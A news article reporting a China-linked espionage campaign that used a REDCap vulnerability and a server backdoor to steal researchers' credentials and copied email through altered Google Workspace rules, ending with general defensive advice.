Chinese Hackers Use Google Workspace for Espionage

A China-linked espionage group has operated for over a year within North American medical, academic, and military research networks. The attackers exploited a vulnerability in the REDCap research systems to gain access to sensitive emails. These attacks aimed to steal confidential information that is significant for national security. The hackers managed to infiltrate the networks unnoticed by installing a backdoor on the REDCap servers. This backdoor allowed them to steal login credentials from researchers and staff.

The attackers were able to access email accounts critical for conducting research projects and military studies. A particularly notable aspect of the attacks was the method of data exfiltration. The hackers modified the victims' Google Workspace rules to copy all incoming and outgoing messages. This technique enabled them to collect a large amount of data without the victims noticing. The affected institutions included both academic facilities and military research organizations.

Attackers focused on sensitive research projects that could potentially provide strategic advantages for China. This type of cyberattack poses a serious threat to national security. Security agencies in North America have identified these incidents as part of a larger pattern of cyberattacks originating from state-sponsored groups. These attacks often target critical infrastructures and research data that are vital for the development of new technologies. The discovery of these attacks has led to increased collaboration between security agencies and the affected institutions.

The response to these attacks includes reviewing and improving security protocols in the affected networks. Experts recommend that organizations regularly check their systems for vulnerabilities and ensure that all employees are aware of the risks of phishing and other cyberattacks. The implementation of multi-factor authentication procedures is also deemed necessary. The incidents raise questions about the security of cloud services, particularly regarding the use of Google Workspace in sensitive areas. The possibility that attackers can manipulate internal rules to steal data has raised concerns about the integrity of such platforms.

Security researchers are calling for a comprehensive review of the security architecture of cloud services. The incidents have been documented by various security research groups that have analyzed the techniques and tactics of the attackers. This information is crucial for preventing future attacks and improving the security landscape in the affected sectors. However, the exact number of affected emails and data remains unclear. The vulnerability exploited by the attackers is an example of the increasing complexity and sophistication of modern cyberattacks.

The attackers not only exploited technical weaknesses but also human errors to achieve their goals. The discovery of these attacks could lead to a reassessment of security strategies in many organizations. The incidents were first made public in May 2026 when security researchers analyzed the attacks and informed the affected institutions. Investigations are ongoing, and further details about the attackers and their methods are expected to emerge. Security agencies warn that similar attacks are likely in the future.